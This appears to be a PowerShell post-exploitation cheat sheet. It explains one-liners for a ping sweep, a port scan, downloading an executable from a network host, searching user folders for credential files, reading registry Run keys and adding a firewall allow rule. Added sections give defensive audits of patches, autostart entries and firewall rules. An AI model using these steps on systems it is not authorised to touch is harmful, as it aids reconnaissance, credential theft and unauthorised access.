PowerShell for Post-Exploitation Tasks.
1. Perform a network ping sweep:
```powershell
PS C:\> 1..255 | % {echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_ | Select-String ttl}
```
- `1..255`: Generates a sequence of numbers from 1 to 255. These represent the last octet of the target IP addresses (`192.168.1.1` to `192.168.1.255`).
- `%`: The shorthand for `ForEach-Object` cmdlet, iterating over each number in the range.
- `ping -n 1 -w 100`: Sends one (`-n 1`) ICMP Echo Request packet to the target IP address with a timeout of 100 milliseconds (`-w 100`).
- `Select-String ttl`: Filters the output of the `ping` command to capture responses with a TTL value, indicating that the target host is reachable.
2. Execute a port scan:
```powershell
PS C:\> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.1.1",$_)) "Port $_ is open!"} 2>$null
```
- `1..1024`: Iterates over the port range from 1 to 1024.
- `new-object Net.Sockets.TcpClient`: Creates an instance of the `TcpClient` class, which is used to attempt a TCP connection to a specific port.
- `.Connect("192.168.1.1", $_)`: Tries to connect to the IP `192.168.1.1` on the port specified by `$_` (the current port in the iteration).
- `"Port $_ is open!"`: If the connection is successful, this message will be displayed.
- `2>$null`: Redirects any error output (e.g., for closed ports) to `$null`, effectively suppressing errors.
3. Download a file via HTTP:
```powershell
PS C:\> (New-Object System.Net.WebClient).DownloadFile("http://192.168.1.1/file.exe", "file.exe")
```
- `New-Object System.Net.WebClient`: Creates a new instance of the `WebClient` class, which provides methods for downloading data from the web.
- `.DownloadFile`: Downloads a file from the specified URL (`http://192.168.1.1/file.exe`) and saves it as `file.exe` locally.
- `"file.exe"`: The local path where the file will be saved.
4. Search for files by name:
```powershell
PS C:\> Get-ChildItem "C:\Users\" -recurse -include *credentials*.txt
```
- `Get-ChildItem "C:\Users\"`: Retrieves the file and directory listings within the `C:\Users\` directory.
- `-recurse`: Recursively searches all subdirectories within the specified path.
- `-include *credentials*.txt`: Filters results to only include files whose names contain the string `credentials` and end with `.txt`.
5. List installed updates:
```powershell
PS C:\> Get-HotFix
```
- `Get-HotFix`: Lists all installed updates and hotfixes on the system. This cmdlet queries the system for records of patches and updates applied via Windows Update or other installation methods.
- It returns information such as the update's ID, description, and the date it was applied.
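As an added example (not from the original page), the raw `Get-HotFix` listing can be turned into a patch-status check: how long since the last update landed, how many security updates are present, and whether a baseline set of KB ids is installed. The age threshold and the `KB0000000` placeholder are assumptions to be replaced with your own baseline.

```powershell
# Added example, not from the original page: patch-recency check built on Get-HotFix.
# The threshold and the KB list are placeholder assumptions; substitute your baseline.
function Get-PatchStatus {
    param(
        [int]$MaxAgeDays = 45,                  # assumption: acceptable days since last update
        [string[]]$RequiredKB = @('KB0000000')  # placeholder KB ids, replace with required patches
    )
    # Some hotfix records carry no InstalledOn date; drop them before sorting by date
    $fixes = Get-HotFix | Where-Object { $_.InstalledOn }
    $latest = ($fixes | Sort-Object InstalledOn -Descending | Select-Object -First 1).InstalledOn
    $age = if ($latest) { (New-TimeSpan -Start $latest -End (Get-Date)).Days } else { $null }
    $installed = $fixes | Select-Object -ExpandProperty HotFixID

    [pscustomobject]@{
        LatestUpdate  = $latest
        DaysSinceLast = $age
        Stale         = ($null -eq $age) -or ($age -gt $MaxAgeDays)
        SecurityFixes = @($fixes | Where-Object Description -eq 'Security Update').Count
        MissingKB     = @($RequiredKB | Where-Object { $installed -notcontains $_ })
    }
}

Get-PatchStatus | Format-List
```

`Get-HotFix` only reports updates tracked through the Windows Installer/Windows Update component store, so a host with no recent records here is a prompt to check the update channel, not proof that nothing was installed.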
6. Access Windows registry:
```powershell
PS C:\> cd HKLM:\
PS HKLM:\> ls
```
- `cd HKLM:\`: Changes the current working directory to the `HKLM` (HKEY_LOCAL_MACHINE) registry hive, which contains system-wide configuration settings.
- `ls`: Lists all keys and values within the current registry path. It retrieves a directory-like structure of registry keys and subkeys.
7. List startup programs from the registry:
```powershell
PS C:\> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\run
```
- `Get-ItemProperty`: Retrieves the properties (values) of the specified registry key.
- `HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\run`: Specifies the registry path where startup programs are listed. This registry path controls which programs are set to run when Windows starts.
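The registry walk in item 6 and the `Run` key read in item 7 combine into a persistence audit. The following is an added example, not from the original page: it enumerates the `Run`/`RunOnce` keys under both `HKLM` and `HKCU`, extracts the image path from each autostart command line, checks its Authenticode signature, and flags images that are unsigned, missing, or located in user-writable directories. The list of suspect directories and the path-extraction regex are heuristics chosen here, not anything the page defines.

```powershell
# Added example, not from the original page: audit autostart entries and flag images
# that lack a valid signature or live somewhere a standard user can write.
function Get-StartupAudit {
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    # Heuristic (assumption): autostart images in these roots deserve a closer look
    $suspectRoots = @($env:APPDATA, $env:LOCALAPPDATA, $env:TEMP, $env:PUBLIC, "$env:USERPROFILE\Downloads")
    # Bookkeeping properties Get-ItemProperty adds to every result
    $psProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties | Where-Object { $_.Name -notin $psProps }) {
            $cmd = [string]$p.Value
            # Extract the executable: a quoted path, else the first token ending in .exe,
            # else the first whitespace-delimited token (unquoted paths with spaces will mis-split)
            $exe = if ($cmd -match '^\s*"([^"]+)"') { $Matches[1] }
                   elseif ($cmd -match '^\s*(\S+?\.exe)') { $Matches[1] }
                   else { ($cmd -split '\s+')[0] }
            $exe = [Environment]::ExpandEnvironmentVariables($exe)

            $exists = Test-Path -LiteralPath $exe -PathType Leaf
            $sig = if ($exists) { (Get-AuthenticodeSignature -LiteralPath $exe).Status } else { 'FileMissing' }
            $inUserDir = $suspectRoots | Where-Object { $_ -and $exe.StartsWith($_, [StringComparison]::OrdinalIgnoreCase) }

            [pscustomobject]@{
                Key       = $key
                Name      = $p.Name
                Image     = $exe
                Signature = $sig
                Flag      = ($sig -ne 'Valid') -or [bool]$inUserDir
            }
        }
    }
}

Get-StartupAudit | Sort-Object Flag -Descending | Format-Table -AutoSize
```

A `Valid` signature is not a clean bill of health and an unsigned entry is not proof of compromise; the point of the `Flag` column is to order the review, and entries should be compared against a known-good baseline taken from the same image.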
8. Encode a string to Base64:
```powershell
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("Hello PowerShell!"))
```
- `[System.Text.Encoding]::UTF8.GetBytes("Hello PowerShell!")`: Converts the string `"Hello PowerShell!"` into a byte array using UTF-8 encoding.
- `[System.Convert]::ToBase64String`: Converts the byte array into a Base64-encoded string.
- Base64 represents binary data as plain text for easier transmission or storage, for example when encoding payloads, credentials, or data for web requests.
9. Manage Windows firewall rules:
- List all firewall rules:
```powershell
PS C:\> Get-NetFirewallRule -All
```
- `Get-NetFirewallRule`: Retrieves the list of all firewall rules, including active, inactive, and default rules.
- `-All`: Includes all rules, even those that are disabled or system-defined.
- Create a new firewall rule:
```powershell
PS C:\> New-NetFirewallRule -Action Allow -DisplayName AllowAccess -RemoteAddress 192.168.1.25
```
- `New-NetFirewallRule`: Creates a new firewall rule.
- `-Action Allow`: Specifies that the rule will allow traffic (as opposed to blocking).
- `-DisplayName AllowAccess`: Sets the name of the rule to `AllowAccess` for easy identification.
- `-RemoteAddress 192.168.1.25`: Specifies that the rule applies to traffic coming from IP address `192.168.1.25`.
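Rules like the one in item 9 are exactly what a firewall review should surface. The following is an added example, not from the original page: it joins each enabled inbound Allow rule with its address and port filters and flags rules whose remote address is `Any`. The cmdlets are the standard `NetSecurity` module ones; the decision to treat `Any` as the flag condition is a choice made here.

```powershell
# Added example, not from the original page: enumerate enabled inbound Allow rules with
# the remote addresses and local ports they permit, flagging those open to any remote host.
function Get-OpenInboundRules {
    Get-NetFirewallRule -Enabled True -Direction Inbound -Action Allow | ForEach-Object {
        # Address and port scope live in separate filter objects tied to the rule
        $addr = $_ | Get-NetFirewallAddressFilter
        $port = $_ | Get-NetFirewallPortFilter
        [pscustomobject]@{
            Name          = $_.DisplayName
            Profile       = $_.Profile
            Protocol      = $port.Protocol
            LocalPort     = ($port.LocalPort -join ',')
            RemoteAddress = ($addr.RemoteAddress -join ',')
            AnyRemote     = ($addr.RemoteAddress -contains 'Any')
        }
    }
}

# Rules reachable from anywhere first; drop the Where-Object to see the full inbound allow list
Get-OpenInboundRules | Where-Object AnyRemote | Sort-Object Name | Format-Table -AutoSize
```

Because `New-NetFirewallRule` defaults to `-Direction Inbound` and the page's command sets no protocol or port, the `AllowAccess` rule it creates appears in this listing with `Protocol Any` and an empty `LocalPort`, scoped only by the remote address. Comparing the output against a stored baseline (for example, `Export-Clixml` of a known-good run) is the quickest way to spot rules that were added later.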
These commands utilize various PowerShell cmdlets and .NET classes to interact with system components such as networking, files, the registry, and the firewall. Each command serves a specific post-exploitation task, whether for information gathering, maintaining persistence, or modifying system configurations.